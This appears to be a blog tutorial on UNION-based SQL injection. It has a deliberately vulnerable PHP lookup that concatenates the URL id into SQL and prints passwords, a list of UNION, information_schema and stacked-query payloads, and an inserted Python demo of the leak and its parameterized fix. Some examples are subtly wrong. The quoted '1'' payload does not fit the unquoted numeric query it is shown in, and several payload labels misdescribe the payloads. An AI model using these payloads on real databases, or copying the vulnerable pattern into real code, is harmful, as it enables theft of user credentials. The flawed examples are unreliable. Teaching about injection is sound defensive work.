[SQL injection - UNION injection] UNION-based joint injection

Table of contents

union injection

1. Grammar introduction:

2. Code example



union injection

1. Grammar introduction:

Overview:

UNION is an operator in the SQL language that combines the results of two or more queries into a single result set. It is supported by almost all major relational database management systems (RDBMS), such as MySQL, Oracle, Microsoft SQL Server, PostgreSQL and SQLite.


grammar:

SELECT column1, column2 FROM table1 
UNION 
SELECT column1, column2 FROM table2;

Each SELECT statement queries data from one table (or more); the UNION keyword then combines the results of these queries into one result set.

(Note: the queries being combined must return the same number of columns, and the corresponding columns must have compatible data types. If the column counts differ or the data types are incompatible, the database returns an error.)



Uses:

  1. Combining result sets: when several query results need to be merged into one result set, UNION does it in a single statement, which simplifies the query and reduces code complexity.
  2. Deduplicating data: UNION automatically removes duplicate rows from the combined result set and returns only unique rows (UNION ALL keeps duplicates). This is useful when merging data from two or more tables while eliminating duplicates.
  3. Extending a query: UNION widens the scope of a query by combining several SELECT statements, each of which can use its own conditions and filters to fetch data from different tables, into one result set.



2. Code example

Example:

<?php
// Assumes $conn is an open mysqli connection created earlier in the script
// Read user input
$id = $_GET['id'];

// Build the SQL query by string concatenation (no validation or escaping)
$sql = "SELECT * FROM users WHERE id = " . $id;

// Execute the SQL query
$result = mysqli_query($conn, $sql);

// Handle the query result
if ($result) {
    // Output each returned row
    while ($row = mysqli_fetch_assoc($result)) {
        echo "Username: " . $row['username'] . "<br>";
        echo "Password: " . $row['password'] . "<br>";
    }
} else {
    // Output an error message
    echo "Query failed";
}
?>

The user specifies the ID of the user to be queried through the id parameter in the URL. However, because the code performs no filtering or validation on $id, an attacker can inject malicious SQL through the id parameter.

For example, the id parameter can be set to the following value:

1' UNION SELECT username, password FROM users--

The constructed SQL query then becomes:

SELECT * FROM users WHERE id = 1' UNION SELECT username, password FROM users--'

This returns the username and password of every user, bypassing the original query condition.

Through such a joint-injection vulnerability, sensitive information can be obtained or other malicious operations performed.
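To make the point above concrete, here is an added example (not from the original post) that reproduces the PHP page's string-concatenated lookup in Python against a constructed in-memory SQLite users table, shows how a UNION payload bypasses the WHERE condition, shows the column-count mismatch error noted under "grammar", and contrasts it with the parameterized query that fixes the bug. The table contents are made up for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed sample data: a tiny in-memory stand-in for the 'users' table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'hash_a');
        INSERT INTO users VALUES (2, 'bob',   'hash_b');
        INSERT INTO users VALUES (3, 'carol', 'hash_c');
    """)
    return conn


def lookup_concat(conn, user_id):
    """Mirrors the PHP page: the URL parameter is glued straight into the SQL text."""
    sql = "SELECT id, username, password FROM users WHERE id = " + user_id
    return conn.execute(sql).fetchall()


def lookup_bound(conn, user_id):
    """Hardened form: a bound parameter is always treated as a value, never as SQL."""
    sql = "SELECT id, username, password FROM users WHERE id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def run_demo():
    conn = make_db()
    # UNION payload whose right-hand SELECT returns the same three columns as the left-hand one.
    payload = "0 UNION SELECT id, username, password FROM users --"
    leaked = lookup_concat(conn, payload)   # WHERE id = 0 matches nothing, UNION adds every row
    safe = lookup_bound(conn, payload)      # same string as a bound value: no such id, empty result

    # Column-count mismatch (two columns vs. three): the engine rejects the combined query,
    # which is why the page's note stresses matching column counts.
    try:
        lookup_concat(conn, "0 UNION SELECT username, password FROM users --")
        mismatch_error = False
    except sqlite3.OperationalError:
        mismatch_error = True
    return leaked, safe, mismatch_error


if __name__ == "__main__":
    rows, safe_rows, mismatch = run_demo()
    print("concatenated query returned", len(rows), "rows; bound query returned", len(safe_rows))
    print("two-column UNION rejected:", mismatch)
```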


payload:

1. Union injection based on joint query:

' UNION SELECT column1, column2, column3 FROM table_name--

2. Error-based union injection:

' UNION ALL SELECT NULL, NULL, NULL, table_name FROM information_schema.tables--

3. Union injection based on blind injection:

' UNION ALL SELECT NULL, (SELECT concat(table_name,0x0a,column_name) FROM information_schema.columns WHERE table_name='表名' LIMIT 1 OFFSET 0)#

4. Union injection based on stacked query:

'; SELECT 1,2,3 UNION ALL SELECT column1, column2, column3 FROM table_name--

... and so on: every SQL injection technique can be tried in combination with UNION.



Network security knowledge base:

https://gitee.com/shubansheng/Treasure_knowledge/blob/master/README.md

GitHub - BLACKxZONE/Treasure_knowledge: https://github.com/BLACKxZONE/Treasure_knowledge

Origin blog.csdn.net/qq_53079406/article/details/131660985